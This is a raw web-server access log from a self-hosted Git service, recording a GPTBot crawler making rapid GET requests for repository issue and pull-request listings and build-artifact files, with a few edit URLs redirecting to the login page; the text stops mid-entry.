"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:19:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:19:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11238] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:19:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11644] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:19:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 925] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:19:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:19:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10737] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:19:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:19:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:13:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:19:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:19:13:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:19:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:19:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:19:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:19:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx?display=source" [Client 74.7.227.38] [Length 11763] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:19:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python?display=source" [Client 74.7.227.38] [Length 11300] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:19:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33682] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33684] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33694] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33684] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:19:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11140] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33387] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 